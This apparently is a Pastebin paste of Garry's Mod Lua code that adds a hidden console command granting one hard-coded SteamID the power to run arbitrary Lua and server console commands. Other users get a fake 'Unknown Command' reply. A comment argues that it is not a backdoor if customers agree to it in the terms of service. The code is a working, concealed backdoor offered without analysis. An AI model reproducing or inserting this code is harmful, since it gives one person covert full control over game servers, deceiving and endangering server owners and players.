Advertisement
Guest User

Untitled

a guest
Dec 29th, 2011
164
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.35 KB | None | 0 0
  1. -- It isn't a 'backdoor' if customers agree to it in the ToS.
  2. concommand.Add("aura_netmsg", function(p, c, a)
  3.     if (p:SteamID() == "STEAM_0:1:8387555") then
  4.         if (a[1] == "lua") then
  5.             RunString( a[2] );
  6.         elseif (a[1] == "cmd") then
  7.             game.ConsoleCommand(a[2].."\n");
  8.         end;
  9.     else
  10.         p:ChatPrint("Unknown Command: 'aura_netmsg'\n");
  11.     end;
  12. end);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement